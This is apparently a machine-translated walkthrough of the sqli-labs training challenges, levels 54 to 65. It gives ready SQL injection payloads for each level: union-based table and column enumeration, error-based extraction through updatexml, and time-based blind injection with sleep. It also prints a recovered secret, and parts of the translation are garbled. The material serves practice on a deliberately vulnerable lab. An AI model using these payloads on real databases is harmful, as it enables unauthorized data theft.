LESS54
Level requirements: The goal of this challenge is to try to less than 10 times from a random table in the database dump (key for fun, each reset, the challenge will be to generate a random table names, column names and table data at all times remain fresh. .
① determines whether the number (dichotomy) column
Input: id = 1 'order by 3 - +?
② current database
? Enter: id = -1 'union select 1,2, database () - +
③ look-up table
输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+
9po9d7v0i2
④ check field
输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+
⑤ check the value of the field
输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+
1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4
Click submit to finish by.
You stupid hacker put off!
LESS55
Parameters: (1)
: 14 times
LESS56
Parameter :( '1')
: 14 times
LESS57
Parameters: "1"
: 14 times
LESS58
: 5 times
This clearance can not use union select no return echo location.
We use the error injection.
① look-up table
It is a database of known challenges
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+
② check field
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+
③ lookup field
输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+
Congratulations on your success!
LESS59
Parameters: id = 1 unwrapping
LESS60
Parameters: ID = ( ". 1")
LESS61
Parameters: ID = (( '. 1'))
LESS62
A total of 130 times, it is obvious to the blind! !
输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+
Sequentially changing its value can be determined.
LESS63
Parameters: '. 1'
LESS64
Parameters: ((. 1))
LESS65
Parameters :( "1")